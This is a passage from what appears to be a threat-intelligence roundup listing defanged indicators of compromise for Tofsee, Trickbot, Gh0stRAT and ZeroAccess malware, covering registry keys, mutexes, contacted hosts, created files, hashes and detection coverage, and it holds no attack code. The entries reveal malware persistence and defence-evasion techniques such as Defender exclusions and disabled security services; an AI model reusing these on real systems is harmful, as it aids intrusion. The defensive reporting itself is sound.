Umbrella\n\n[](<https://1.bp.blogspot.com/-tnyj0tFUBxM/XVbLIZStF7I/AAAAAAAACWM/kYzbbwLc0d4DADi-hAgbpeY0PFZQcsmMgCLcBGAs/s1600/01fbd952fe57f673aea818e12a0aa675c9e29e1ba0f85d28645a926f3df4f7f4_umbrella.png>)\n\n \n\n\n \n\n\n* * *\n\n### Win.Malware.Tofsee-7112026-1\n\n#### Indicators of Compromise\n\nRegistry Keys | Occurrences \n---|--- \n`<HKU>\\.DEFAULT\\CONTROL PANEL\\BUSES \nValue Name: Config3 ` | 16 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\<random, matching '[A-Z0-9]{8}'> \nValue Name: Type ` | 16 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\<random, matching '[A-Z0-9]{8}'> \nValue Name: Start ` | 16 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\<random, matching '[A-Z0-9]{8}'> \nValue Name: ErrorControl ` | 16 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\<random, matching '[A-Z0-9]{8}'> \nValue Name: DisplayName ` | 16 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\<random, matching '[A-Z0-9]{8}'> \nValue Name: WOW64 ` | 16 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\<random, matching '[A-Z0-9]{8}'> \nValue Name: ObjectName ` | 16 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\<random, matching '[A-Z0-9]{8}'> \nValue Name: Description ` | 16 \n`<HKU>\\.DEFAULT\\CONTROL PANEL\\BUSES ` | 16 \n`<HKU>\\.DEFAULT\\CONTROL PANEL\\BUSES \nValue Name: Config0 ` | 16 \n`<HKU>\\.DEFAULT\\CONTROL PANEL\\BUSES \nValue Name: Config1 ` | 16 \n`<HKU>\\.DEFAULT\\CONTROL PANEL\\BUSES \nValue Name: Config2 ` | 16 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\<random, matching '[A-Z0-9]{8}'> ` | 16 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\<random, matching '[A-Z0-9]{8}'> \nValue Name: ImagePath ` | 10 \n`<HKLM>\\SOFTWARE\\MICROSOFT\\WINDOWS DEFENDER\\EXCLUSIONS\\PATHS \nValue Name: C:\\Windows\\SysWOW64\\ibpvucix ` | 3 \n`<HKLM>\\SOFTWARE\\MICROSOFT\\WINDOWS DEFENDER\\EXCLUSIONS\\PATHS \nValue Name: C:\\Windows\\SysWOW64\\tmagfnti ` | 2 \n`<HKLM>\\SOFTWARE\\MICROSOFT\\WINDOWS DEFENDER\\EXCLUSIONS\\PATHS \nValue Name: C:\\Windows\\SysWOW64\\vocihpvk ` | 2 \n`<HKLM>\\SOFTWARE\\MICROSOFT\\WINDOWS DEFENDER\\EXCLUSIONS\\PATHS \nValue Name: C:\\Windows\\SysWOW64\\fymsrzfu ` | 2 \n`<HKLM>\\SOFTWARE\\MICROSOFT\\WINDOWS DEFENDER\\EXCLUSIONS\\PATHS \nValue Name: C:\\Windows\\SysWOW64\\qjxdckqf ` | 2 \n`<HKLM>\\SOFTWARE\\MICROSOFT\\WINDOWS DEFENDER\\EXCLUSIONS\\PATHS \nValue Name: C:\\Windows\\SysWOW64\\haoutbhw ` | 1 \n`<HKLM>\\SOFTWARE\\MICROSOFT\\WINDOWS DEFENDER\\EXCLUSIONS\\PATHS \nValue Name: C:\\Windows\\SysWOW64\\piwcbjpe ` | 1 \n`<HKLM>\\SOFTWARE\\MICROSOFT\\WINDOWS DEFENDER\\EXCLUSIONS\\PATHS \nValue Name: C:\\Windows\\SysWOW64\\slzfemsh ` | 1 \n`<HKLM>\\SOFTWARE\\MICROSOFT\\WINDOWS DEFENDER\\EXCLUSIONS\\PATHS \nValue Name: C:\\Windows\\SysWOW64\\yrflksyn ` | 1 \n`<HKLM>\\SOFTWARE\\MICROSOFT\\WINDOWS DEFENDER\\EXCLUSIONS\\PATHS \nValue Name: C:\\Windows\\SysWOW64\\cvjpowcr ` | 1 \nIP Addresses contacted by malware. Does not indicate maliciousness | Occurrences \n---|--- \n`239[.]255[.]255[.]250` | 16 \n`69[.]55[.]5[.]250` | 16 \n`172[.]217[.]11[.]36` | 16 \n`46[.]4[.]52[.]109` | 16 \n`176[.]111[.]49[.]43` | 16 \n`85[.]25[.]119[.]25` | 16 \n`144[.]76[.]199[.]2` | 16 \n`144[.]76[.]199[.]43` | 16 \n`43[.]231[.]4[.]7` | 16 \n`192[.]0[.]47[.]59` | 16 \n`74[.]6[.]137[.]65` | 16 \n`172[.]217[.]7[.]132` | 16 \n`98[.]137[.]159[.]27` | 16 \n`95[.]181[.]178[.]17` | 16 \n`168[.]95[.]5[.]116` | 15 \n`74[.]125[.]141[.]27` | 15 \n`74[.]125[.]193[.]26` | 15 \n`67[.]195[.]228[.]109` | 14 \n`212[.]82[.]101[.]46` | 13 \n`168[.]95[.]5[.]216` | 13 \n`67[.]195[.]228[.]111` | 13 \n`67[.]195[.]230[.]36` | 13 \n`69[.]31[.]136[.]5` | 12 \n`212[.]227[.]17[.]8` | 12 \n`213[.]209[.]1[.]129` | 12 \n \n*See JSON for more IOCs\n\nDomain Names contacted by malware. Does not indicate maliciousness | Occurrences \n---|--- \n`250[.]5[.]55[.]69[.]in-addr[.]arpa` | 16 \n`250[.]5[.]55[.]69[.]zen[.]spamhaus[.]org` | 16 \n`250[.]5[.]55[.]69[.]cbl[.]abuseat[.]org` | 16 \n`mta5[.]am0[.]yahoodns[.]net` | 16 \n`250[.]5[.]55[.]69[.]dnsbl[.]sorbs[.]net` | 16 \n`whois[.]iana[.]org` | 16 \n`250[.]5[.]55[.]69[.]bl[.]spamcop[.]net` | 16 \n`whois[.]arin[.]net` | 16 \n`250[.]5[.]55[.]69[.]sbl-xbl[.]spamhaus[.]org` | 16 \n`microsoft-com[.]mail[.]protection[.]outlook[.]com` | 16 \n`honeypus[.]rusladies[.]cn` | 16 \n`marina99[.]ruladies[.]cn` | 16 \n`sexual-pattern3[.]com` | 16 \n`coolsex-finders5[.]com` | 16 \n`super-efectindating1[.]com` | 16 \n`msx-smtp-mx1[.]hinet[.]net` | 15 \n`hotmail-com[.]olc[.]protection[.]outlook[.]com` | 14 \n`msx-smtp-mx2[.]hinet[.]net` | 14 \n`mx-eu[.]mail[.]am0[.]yahoodns[.]net` | 13 \n`mx-aol[.]mail[.]gm0[.]yahoodns[.]net` | 13 \n`eur[.]olc[.]protection[.]outlook[.]com` | 13 \n`web[.]de` | 12 \n`etb-1[.]mail[.]tiscali[.]it` | 12 \n`mx-ha02[.]web[.]de` | 12 \n`msa[.]hinet[.]net` | 12 \n \n*See JSON for more IOCs\n\nFiles and or directories created | Occurrences \n---|--- \n`%HOMEPATH%` | 16 \n`%SystemRoot%\\SysWOW64\\config\\systemprofile` | 16 \n`%SystemRoot%\\SysWOW64\\config\\systemprofile:.repos` | 16 \n`%TEMP%\\<random, matching '[a-z]{8}'>.exe` | 16 \n`%SystemRoot%\\SysWOW64\\<random, matching '[a-z]{8}'>` | 16 \n`%System32%\\<random, matching '[a-z]{8}\\[a-z]{6,8}'>.exe (copy)` | 16 \n`%TEMP%\\edtpwsx.exe` | 1 \n`%TEMP%\\ondzgch.exe` | 1 \n \n#### File Hashes\n\n` 1c331b81428107c325673ea4b19acdff598772d9e1069e09ca92cb88d223c326 1c916b795f49331678816ef6cfba0dbdbddd4b92a421e086ab2fe2ea095d10e9 398c23230679c69942c5d64c7aaf0e9e8ca3434d54559871f3a3a24fbd9ffa3c 4d660a6519c258074627f7d30a4878e15a4e621bd79f21a34f4550c54ef38c4e 5f4bd5a0728432e4731b9d2606bacb05d7c6f10ad926735f3e4d9dee10791f85 7d96ef5dfba65346fa3ffbcd23016f21e0a523e2215e963f21cc8c939c2e35a0 9bf983cc999b2a3bd029e21e445bca85853b58d66247c7221157fab41fbd19d8 9e5897942fac812b74be41b06b5e1cd1ff4e9fd9b71d10aadca3d5f368cda0d1 a8adbab4a72506f7343b7ff78a028fd26ec944a1d4de846ee0bf9651196d7724 a8f74812b66b89f9c0450b2f565d3ba2b417e7e10514618c3306de37749af886 ad34ec4764147faaee82935e142eedfe5569f88ef81195281539075a0f3c91ac b4f6aa14eb833c83413f72a4e901d0e92c7da45828c5438594693f68c2a3ebfe b75a2838b93b6ec47b27bd5c9798386775e9a3dfcac5c3562a7ff139eaa14ce3 be8a71e6dfa63485be4a848cf6d0bc1da15b20fb9735e0c0ed08e346840096e0 d62553c4ef53220d32af9e5eb1a0accca3ca6aac7e9f3539119fec0718edd65b f095b72dc6ba5c3c3f2e410d0f1766a8f6ebbecec1a4914b957f9a7225cc6c00 `\n\n#### Coverage\n\nProduct | Protection \n---|--- \nAmp |  \nCloudlock | N/A \nCws |  \nEmail Security |  \nNetwork Security | N/A \nStealthwatch | N/A \nStealthwatch Cloud | N/A \nThreat Grid |  \nUmbrella |  \nWsa |  \n \n#### Screenshots of Detection\n\n#### AMP\n\n[](<https://1.bp.blogspot.com/-tUfWJk_0YKw/XVbLZsk_8QI/AAAAAAAACWY/S347748S0YsFfeD27hEPz8BJSY96EwO8gCLcBGAs/s1600/9bf983cc999b2a3bd029e21e445bca85853b58d66247c7221157fab41fbd19d8_amp.png>)\n\n \n\n\n#### ThreatGrid\n\n[](<https://1.bp.blogspot.com/-cCEa3EBp6J8/XVbLfVvnovI/AAAAAAAACWc/DkaXxgGWNC8oJ1ddxBD1euwoNTbCjHvQACLcBGAs/s1600/9bf983cc999b2a3bd029e21e445bca85853b58d66247c7221157fab41fbd19d8_tg.png>)\n\n \n\n\n#### Umbrella\n\n[](<https://1.bp.blogspot.com/-uemif8GUhTM/XVbLkiwBxqI/AAAAAAAACWg/AvwNQHKs1xUl7qLg5YSM6oJpybr3DHmbgCLcBGAs/s1600/213b7ea1e4fee2c08e48c1536b099ab55b0ace638710a8c1920a834ac80648b5_umbrella.png>)\n\n \n\n\n \n\n\n* * *\n\n### Win.Malware.Trickbot-7112005-1\n\n#### Indicators of Compromise\n\nRegistry Keys | Occurrences \n---|--- \n`<HKLM>\\SOFTWARE\\MICROSOFT\\SYSTEMCERTIFICATES\\AUTHROOT\\CERTIFICATES\\DAC9024F54D8F6DF94935FB1732638CA6AD77C13 \nValue Name: Blob ` | 3 \nMutexes | Occurrences \n---|--- \n`Global\\VLock` | 25 \nIP Addresses contacted by malware. Does not indicate maliciousness | Occurrences \n---|--- \n`116[.]203[.]16[.]95` | 6 \n`216[.]239[.]34[.]21` | 5 \n`194[.]87[.]92[.]184` | 4 \n`188[.]137[.]122[.]83` | 4 \n`185[.]158[.]115[.]75` | 4 \n`185[.]158[.]115[.]49` | 4 \n`216[.]239[.]32[.]21` | 3 \n`216[.]239[.]38[.]21` | 3 \n`216[.]239[.]36[.]21` | 3 \n`185[.]158[.]115[.]87` | 3 \n`188[.]137[.]122[.]68` | 3 \n`195[.]133[.]146[.]156` | 3 \n`94[.]242[.]206[.]204` | 3 \n`198[.]27[.]74[.]146` | 2 \n`50[.]16[.]229[.]140` | 2 \n`194[.]87[.]232[.]146` | 2 \n`23[.]21[.]121[.]219` | 1 \n`104[.]20[.]17[.]242` | 1 \n`54[.]243[.]147[.]226` | 1 \n`54[.]235[.]124[.]112` | 1 \n`104[.]20[.]16[.]242` | 1 \n`23[.]23[.]243[.]154` | 1 \n`3[.]224[.]145[.]145` | 1 \n`34[.]196[.]181[.]158` | 1 \n`23[.]23[.]83[.]153` | 1 \n \n*See JSON for more IOCs\n\nDomain Names contacted by malware. Does not indicate maliciousness | Occurrences \n---|--- \n`ipinfo[.]io` | 6 \n`ip[.]anysrc[.]net` | 6 \n`api[.]ipify[.]org` | 5 \n`myexternalip[.]com` | 3 \n`icanhazip[.]com` | 2 \n`ipecho[.]net` | 2 \n`checkip[.]amazonaws[.]com` | 2 \n`wtfismyip[.]com` | 2 \n`elb097307-934924932[.]us-east-1[.]elb[.]amazonaws[.]com` | 2 \n`checkip[.]us-east-1[.]prod[.]check-ip[.]aws[.]a2z[.]com` | 1 \nFiles and or directories created | Occurrences \n---|--- \n`%APPDATA%\\winapp\\Modules` | 25 \n`%System32%\\Tasks\\services update` | 25 \n`%APPDATA%\\winapp\\client_id` | 25 \n`%APPDATA%\\winapp\\group_tag` | 25 \n`%APPDATA%\\winapp` | 25 \n`%APPDATA%\\WINAPP\\<original file name>.exe` | 25 \n`%SystemRoot%\\Tasks\\services update.job` | 23 \n \n#### File Hashes\n\n` 00c98d727a85576416dba2a3a68010f986ae276935435e6d9eb02d33fb71b3a3 0143365726dffade4573b49e8c816d414c8ca96567a8163cbb714a4b9c18df2d 051eeb1a5f4ef84caff3c5a7abcebb1839569516480df43c929aba282eb8ecb2 0fff84cfd0c674f7d55a39cb6be3bb7fccb3549dbfd9bc8f8b4c8c6307cc5102 112a18bcbc8424b2bdb7ea574f5696288d28a28dda3f0aaa9894a84285c932aa 11513df12b19240af3485b6b0d0c871c305e2644e6503770baf8fb2949542462 19910cf1b0fb40f8143c459e93a6110393b502de81646ed7685c7a0766e4823d 2807fea0af4c94116f0677eb94d798b6f40c3a3cc50ed8d2d2184a061ce30904 292920637d78485e4053b4a056d569f2e17cb8ab531f3372d18402c35fd735bf 30938782dd1ae8ff1a35c17821860745f613a5267e18171e7336d1c6d5f5b6b1 30f321827bea98609847dc047de756f7b86074bb3f5c6e4c7875f25db5dcd627 362d936eebd48241b9e3b6ae0f8650365af42aa307320438ae170862750b2a08 3dd50fe971d7256311dab97ac7afeb0a6ec91de2feccb125eb09ac8a22947005 3e98c771dd86669152fb58cfc0ecd7d264426ebe125ee4d96893efad5af5d236 3ecf64c343752bfbed1a8984cfb207309133df964da0b2e086509e8aed167a66 541729295b97eaa2ec3a566c2095b5e4c03239d9b1235d4a2b6331f3dd986f75 639adafd87d067c1cc5c5d1be870f3800e719637dab20e435f379fc86b268d15 653fc5565b1e8746ddaa507722815fc225ce5c327fa69dbbdaf8924880197035 6809cf34ac7fa454a8d8c25482c7a9acb44be1222bc89f2d478a953d93f63f3d 74547a954562f29ea05230900daab9c043e088fd1a38cb2d077ba4624ef51523 7a7029415edf56936d5eaf003f413a0b778fbc279168cc7cc5e3166a14aaf69a 7be5520d05f7f6afc0dbdf945faa7c93dbc3d3394a6fc8fc30532a6d241f10a1 7bf167e2fd1ad3b45e42fcfce427c702cdb4df6e96602a183fee57d777140a18 854124fe1ae699a3dfd99b89a0b44101e74039ea8f06c781254f4aeca07b7013 8a58ff91b277c4b10565d90fa8e0d847759276fa77983762337dc6bf916aa78e `\n\n*See JSON for more IOCs\n\n#### Coverage\n\nProduct | Protection \n---|--- \nAmp |  \nCloudlock | N/A \nCws |  \nEmail Security |  \nNetwork Security | N/A \nStealthwatch | N/A \nStealthwatch Cloud | N/A \nThreat Grid |  \nUmbrella | N/A \nWsa | N/A \n \n#### Screenshots of Detection\n\n#### AMP\n\n[](<https://1.bp.blogspot.com/-N8AdJwU4a98/XVbMqd2--MI/AAAAAAAACW0/heAk2waBQ1kC3rhdZcCgq-MeH_ixTuSCwCLcBGAs/s1600/30938782dd1ae8ff1a35c17821860745f613a5267e18171e7336d1c6d5f5b6b1_amp.png>)\n\n \n\n\n#### ThreatGrid\n\n[](<https://1.bp.blogspot.com/-2h5biapK0CA/XVbMt5O1qfI/AAAAAAAACW4/Np-Hf6aUiSEysqfo41dIpVoH4me2F7VXwCLcBGAs/s1600/30938782dd1ae8ff1a35c17821860745f613a5267e18171e7336d1c6d5f5b6b1_tg.png>)\n\n \n\n\n \n\n\n* * *\n\n### Win.Malware.Gh0stRAT-7109635-2\n\n#### Indicators of Compromise\n\nRegistry Keys | Occurrences \n---|--- \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\STUVWX ` | 26 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\STUVWX \nValue Name: MarkTime ` | 26 \nMutexes | Occurrences \n---|--- \n`193.112.13.217:7788:Stuvwx` | 26 \nIP Addresses contacted by malware. Does not indicate maliciousness | Occurrences \n---|--- \n`193[.]112[.]13[.]217` | 26 \n \n#### File Hashes\n\n` 0cc11eb852f66920b4a4a35dc34b4e05f3612640b1963bd0ef8088022e2451f7 103960c11c696e1ed51771fec28b70d5cd0c1feb071575e4122827ac7541092b 1156fabd2305bd3ce5b218a59c3f3cfd99671dc8323fda13c156aebf26ee3ed8 11978ef69a330b0d4cc544f48bafbca5125019fe147fcaf2db0bd72fe94c4b4a 164c0c94d252f388ab7825a8bd9abf8cacc45cbf34281edb72951982874591ab 1af0bbdad437c6f711447ccb84444b92df5ba237acc0b33f6eebe0d48fd2f5a2 1ef070ae000ecca44fd13b1c3b642a7a5ef8894becc9a228f2aba33c04f267d5 24436d1687d5a814d3552f9fe6aed8d3778a66888508d1685d7c8c39d4b3b5a5 249cea1515c2c625b5e117a9495cce088f64dfe39dfab2b9d47d9071e2516900 2512e7506467e005bda030357121e832ff0dddc6a670ae4c732bac8345a0e2cf 265c64b98cd0d8515c829654ea931d751e9526b61f45f1d4799c41578f94534c 26f34567a93de01d7e6853e9ae31eb0f1848dee525b0ee605e1c1884accc4982 274d09e6e43dc96ba17a782a30afd525c972f3ad50e73655d8cbfe94ea97b481 2add1b8118caae8e35384758ffabf7fb9cd5eed7e7ae6189572f92993176cf7c 2c771b1e0003485b554e8014b428c9d53ad93d457c04c96b9e514f0f33e2e6ba 2cdd4e59d78f0a3537c1e1c5a7b9fb4c369a20d79a057568a51a2cbebb2f8241 2dae697a1aa350218fb9c4c6ed9d28caa9eff1ad7bfbd0feb32dc523e5c7baf9 3073891867551a6f111eb2f8af3e02729bf97627da4d019fc289433de4cfc35b 30fe5c510a0dc5ad89fcd66491ff24f605a90a2c4a53c67a9969fe15a4a5d0a7 313e7c484e87f221fe3e7af0aab2e17eac7c5a1f1a6c6fcf96140f1a24ba95ba 3176a16b8d3fdcd6162a24ea2979f82d8d1ec4bb98e15c299affd56704bf30d6 32824a80e061fa64a2cc928d3fbde4f742dfb22b4bd9daa13c2e5ab80697c836 333afdc84193d7b7b0d4d1c1e94fcd38426660db5f0fe8fb6dff57d0436a72eb 34e270be03c14465005a11e6eeca6c6c6437f24d9d0a120387cdc759519ad751 352d10cb6917a8bd67bd4054b5307ee38caa2ca63be034edda31371954fccb70 `\n\n*See JSON for more IOCs\n\n#### Coverage\n\nProduct | Protection \n---|--- \nAmp |  \nCloudlock | N/A \nCws |  \nEmail Security |  \nNetwork Security | N/A \nStealthwatch | N/A \nStealthwatch Cloud | N/A \nThreat Grid |  \nUmbrella | N/A \nWsa | N/A \n \n#### Screenshots of Detection\n\n#### AMP\n\n[](<https://1.bp.blogspot.com/-sE-75RhSGw0/XVbM-tgtJKI/AAAAAAAACXE/Nl8lKI8XHBcLzK-7sm8rQ-wTVWYDx69IACLcBGAs/s1600/2512e7506467e005bda030357121e832ff0dddc6a670ae4c732bac8345a0e2cf_amp.png>)\n\n \n\n\n#### ThreatGrid\n\n[](<https://1.bp.blogspot.com/-4a-eui_dFv0/XVbNEm4eFOI/AAAAAAAACXI/HkgHAlRD-pAQzCTBSVTwsDpvNT0XbQOXQCLcBGAs/s1600/a70e8def87bb52571c269bdaa39175a388b5ec4efb6a8c12a38cfa91ded75c18_tg.png>)\n\n \n\n\n \n\n\n* * *\n\n### Win.Packed.Zeroaccess-7109532-0\n\n#### Indicators of Compromise\n\nRegistry Keys | Occurrences \n---|--- \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\MPSSVC \nValue Name: DeleteFlag ` | 19 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\WSCSVC \nValue Name: DeleteFlag ` | 19 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\BROWSER \nValue Name: Start ` | 19 \n`<HKCR>\\CLSID\\{FBEB8A05-BEEE-4442-804E-409D6C4515E9}\\INPROCSERVER32 \nValue Name: ThreadingModel ` | 19 \n`<HKCR>\\CLSID\\{FBEB8A05-BEEE-4442-804E-409D6C4515E9}\\INPROCSERVER32 ` | 19 \n`<HKLM>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUN \nValue Name: Windows Defender ` | 19 \n`<HKLM>\\SOFTWARE\\CLASSES\\CLSID\\{5839FCA9-774D-42A1-ACDA-D6A79037F57F}\\INPROCSERVER32 ` | 19 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\WINDEFEND \nValue Name: Type ` | 19 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\WINDEFEND \nValue Name: ErrorControl ` | 19 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\SHAREDACCESS \nValue Name: Type ` | 19 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\SHAREDACCESS \nValue Name: ErrorControl ` | 19 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\IPHLPSVC \nValue Name: Type ` | 19 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\IPHLPSVC \nValue Name: ErrorControl ` | 19 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\IPHLPSVC \nValue Name: DeleteFlag ` | 19 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\WSCSVC \nValue Name: Type ` | 19 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\WSCSVC \nValue Name: ErrorControl ` | 19 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\MPSSVC \nValue Name: Type ` | 19 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\MPSSVC \nValue Name: ErrorControl ` | 19 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\WINSOCK2\\PARAMETERS\\PROTOCOL_CATALOG9\\CATALOG_ENTRIES\\000000000010 \nValue Name: PackedCatalogItem ` | 19 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\WINSOCK2\\PARAMETERS\\PROTOCOL_CATALOG9\\CATALOG_ENTRIES\\000000000009 \nValue Name: PackedCatalogItem ` | 19 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\WINSOCK2\\PARAMETERS\\PROTOCOL_CATALOG9\\CATALOG_ENTRIES\\000000000008 \nValue Name: PackedCatalogItem ` | 19 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\WINSOCK2\\PARAMETERS\\PROTOCOL_CATALOG9\\CATALOG_ENTRIES\\000000000007 \nValue Name: PackedCatalogItem ` | 19 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\WINSOCK2\\PARAMETERS\\PROTOCOL_CATALOG9\\CATALOG_ENTRIES\\000000000006 \nValue Name: PackedCatalogItem ` | 19 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\WINSOCK2\\PARAMETERS\\PROTOCOL_CATALOG9\\CATALOG_ENTRIES\\000000000005 \nValue Name: PackedCatalogItem ` | 19 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\WINSOCK2\\PARAMETERS\\PROTOCOL_CATALOG9\\CATALOG_ENTRIES\\000000000004 \nValue Name: PackedCatalogItem ` | 19 \nIP Addresses contacted by malware. Does not indicate maliciousness | Occurrences \n---|--- \n`222[.]254[.]253[.]254` | 19 \n`83[.]133[.]123[.]20` | 15 \n`88[.]254[.]253[.]254` | 15 \n`92[.]254[.]253[.]254` | 15 \n`117[.]254[.]253[.]254` | 15 \n`115[.]254[.]253[.]254` | 15 \n`87[.]254[.]253[.]254` | 15 \n`134[.]254[.]253[.]254` | 14 \n`119[.]254[.]253[.]254` | 14 \n`184[.]254[.]253[.]254` | 12 \n`180[.]254[.]253[.]254` | 12 \n`182[.]254[.]253[.]254` | 12 \n`190[.]254[.]253[.]254` | 12 \n`206[.]254[.]253[.]254` | 12 \n`166[.]254[.]253[.]254` | 12 \n`197[.]254[.]253[.]254` | 12 \n`135[.]254[.]253[.]254` | 11 \n`178[.]148[.]144[.]15` | 9 \n`74[.]194[.]69[.]92` | 9 \n`68[.]173[.]181[.]191` | 9 \n`188[.]67[.]123[.]100` | 9 \n`78[.]221[.]193[.]65` | 8 \n`198[.]96[.]34[.]46` | 8 \n`68[.]64[.]113[.]104` | 8 \n`24[.]35[.]22[.]12` | 8 \n \n*See JSON for more IOCs\n\nDomain Names contacted by malware. Does not indicate maliciousness | Occurrences \n---|--- \n`j[.]maxmind[.]com` | 15 \n`uikvdwhrextuxymklwbrodjzhj[.]com` | 1 \n`xikzzyxnfkaepapadgned[.]com` | 1 \nFiles and or directories created | Occurrences \n---|--- \n`\\systemroot\\assembly\\GAC_32\\Desktop.ini` | 19 \n`\\systemroot\\assembly\\GAC_64\\Desktop.ini` | 19 \n`%System32%\\LogFiles\\Scm\\e22a8667-f75b-4ba9-ba46-067ed4429de8` | 19 \n`%SystemRoot%\\assembly\\GAC_32\\Desktop.ini` | 19 \n`%SystemRoot%\\assembly\\GAC_64\\Desktop.ini` | 19 \n`\\$Recycle.Bin\\S-1-5-18` | 19 \n`\\$Recycle.Bin\\S-1-5-18\\$0f210b532df043a6b654d5b43088f74f` | 19 \n`\\$Recycle.Bin\\S-1-5-18\\$0f210b532df043a6b654d5b43088f74f\\@` | 19 \n`\\$Recycle.Bin\\S-1-5-18\\$0f210b532df043a6b654d5b43088f74f\\L` | 19 \n`\\$Recycle.Bin\\S-1-5-18\\$0f210b532df043a6b654d5b43088f74f\\U` | 19 \n`\\$Recycle.Bin\\S-1-5-18\\$0f210b532df043a6b654d5b43088f74f\\n` | 19 \n`\\$Recycle.Bin\\S-1-5-21-2580483871-590521980-3826313501-500\\$0f210b532df043a6b654d5b43088f74f` | 19 \n`\\$Recycle.Bin\\S-1-5-21-2580483871-590521980-3826313501-500\\$0f210b532df043a6b654d5b43088f74f\\@` | 19 \n`\\$Recycle.Bin\\S-1-5-21-2580483871-590521980-3826313501-500\\$0f210b532df043a6b654d5b43088f74f\\L` | 19 \n`\\$Recycle.Bin\\S-1-5-21-2580483871-590521980-3826313501-500\\$0f210b532df043a6b654d5b43088f74f\\U` | 19 \n`\\$Recycle.Bin\\S-1-5-21-2580483871-590521980-3826313501-500\\$0f210b532df043a6b654d5b43088f74f\\n` | 19 \n`\\RECYCLER\\S-1-5-18\\$ad714f5b8798518b3ccb73fd900fd2ba\\@` | 17 \n`\\RECYCLER\\S-1-5-18\\$ad714f5b8798518b3ccb73fd900fd2ba\\n` | 17 \n`\\RECYCLER\\S-1-5-21-1258710499-2222286471-4214075941-500\\$ad714f5b8798518b3ccb73fd900fd2ba\\@` | 17 \n`\\RECYCLER\\S-1-5-21-1258710499-2222286471-4214075941-500\\$ad714f5b8798518b3ccb73fd900fd2ba\\n` | 17 \n`%SystemRoot%\\assembly\\GAC\\Desktop.ini` | 17 \n`4.@ (copy)` | 1 \n`8.@ (copy)` | 1 \n`80000000.@ (copy)` | 1 \n`80000032.@ (copy)` | 1 \n \n*See JSON for more IOCs\n\n#### File Hashes\n\n` 64f81a35325dd38c136a632f0e23d167407a0c4963a70761d4ab5707775f0d23 67ebc3153ede004c1af8b82ecd6f4713573f4c29b4a84c0500d761f483ad9172 688db1253d2dcdaf11bb2e8f03790dea9b10625b14b20531f4ea108801066f62 78951871e9a63fa3907da13165bab1119addd1ce8a3b376afae47b532e5d3653 7d8a67472d130e64d41205a7c1e5263b4fe6a4c6dc2b413618fd9e38ce47f536 8eea2b29e69058398957d5972b62b47947d090c2610bcd45ee593fa92bf25004 91fff0045ed0ac9433217ee7dd1f5ede0554588995892e026044d8d9f9371e1a 9a254fc4e4ca669bab5ad0a830ab43a9ebee6b835fdf794f76a8575d2ca8d548 9db192e4eced11fc3f84d6d8f6302e0230798993bc2b9efca6170428fba13906 a1335dcc4001df7691151413c8c1280dcda1a28a5bd21e82673de4d7560116b7 a2f377e3ff205bc71b5c2a88957578d2a6fb9d390d7ba19fa5117fb0f17736b3 c11c70ca57c92e7224b2c011bb8559d5214ff644fec730a52e02eee172a8a043 c443515f2c11f9cce0be0bd88532bd2b0885d2836bb0b5abb4c2e9198bb2121b d17a1fb8e452ae4fce1f2763a32b209b6663c600dcf253fd1e943e481ca90e63 dcfd777c230140e79392ba5adf4f6aa9ae249d68eb18cf2ba3b74eca47a2b3c2 df6e0399978745daad9974c24eecc3859740bc2e2ece4a7ec970cefcdd5a5bbe eb5d5d7b8119f0819a9f00bd20e3c200e9e938a7705bcad0afc86f254d62a78c efbf80ac6287c82b3231e87957271cadf5c5130eeea7b2e456ffa8b002cbde62 f12f6a6b3358a8dee157fa6bc7170d94cbf2e6f890c86791af20c1a841c01c17 f77e3f0bf61edecfc8f50904e19b9746ba78be95520288d824b61777b04649c6 `\n\n#### Coverage\n\nProduct | Protection \n---|--- \nAmp |  \nCloudlock | N/A \nCws |  \nEmail Security |  \nNetwork Security | N/A \nStealthwatch | N/A \nStealthwatch Cloud | N/A \nThreat Grid |  \nUmbrella | N/A \nWsa | N/A \n \n#### Screenshots of Detection\n\n#### AMP\n\n[](<https://1.bp.blogspot.com/-uK9BlH_AHNk/XVbNUeQXZKI/AAAAAAAACXU/iplNEGFNAvgIwEryWosVwR2nTNw1ck5OQCLcBGAs/s1600/eb5d5d7b8119f0819a9f00bd20e3c200e9e938a7705bcad0afc86f254d62a78c_amp.png>)\n\n \n\n\n#### 